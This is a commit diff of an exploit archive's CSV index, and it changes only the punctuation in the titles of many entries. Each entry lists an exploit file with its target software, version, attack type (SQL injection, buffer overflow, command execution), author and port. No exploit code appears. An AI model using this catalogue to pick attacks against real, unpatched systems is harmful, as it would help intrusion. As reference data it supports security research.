Updated 03_23_2014

Offensive Security 2014-03-23 04:30:36 +00:00
parent 81eda5a35c
commit 2d7502a652
25 changed files with 1597 additions and 725 deletions

157
files.csv

@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port
1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0
1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0
1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0
@ -1408,7 +1408,7 @@ id,file,description,date,author,platform,type,port
1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0
1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0
1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300
1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080
1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port
1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0
1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0
1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0
@ -4997,7 +4997,7 @@ id,file,description,date,author,platform,type,port
5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability",2008-04-04,JIKO,php,webapps,0
5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion Vulnerability",2008-04-04,w0cker,php,webapps,0
@ -5382,7 +5382,7 @@ id,file,description,date,author,platform,type,port
5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0
5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0
5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0
5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0
@ -8316,7 +8316,7 @@ id,file,description,date,author,platform,type,port
8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0
8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0
8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0
8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0
8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0
@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port
9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0
9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0
9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0
9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0
9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0
@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0
9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0
9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0
9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0
@ -9290,50 +9290,50 @@ id,file,description,date,author,platform,type,port
9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0
9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution",2009-02-25,patrick,multiple,webapps,0
9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar Buffer Overflow",2001-04-04,patrick,linux,remote,123
9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup Remote Command Execution",2004-10-21,patrick,multiple,remote,0
9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 Memory Access",2007-04-23,"H D Moore",multiple,remote,0
9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch Command Execution",2008-10-23,egypt,multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123
9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0
9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0
9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0
9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0
9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0
9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0
9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
@ -9383,7 +9383,7 @@ id,file,description,date,author,platform,type,port
10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0
10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
@ -9393,25 +9393,25 @@ id,file,description,date,author,platform,type,port
10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10022,platforms/linux/local/10022.c,"Linux Kernel 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0
10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
10025,platforms/linux/remote/10025.rb,"University of Washington imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144
10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80
10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80
10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515
10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 report Buffer Overflow",2008-01-08,MC,bsd,remote,49
10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515
10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49
10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b CGI Overflow",2004-08-19,skape,cgi,webapps,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
@ -9436,7 +9436,7 @@ id,file,description,date,author,platform,type,port
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
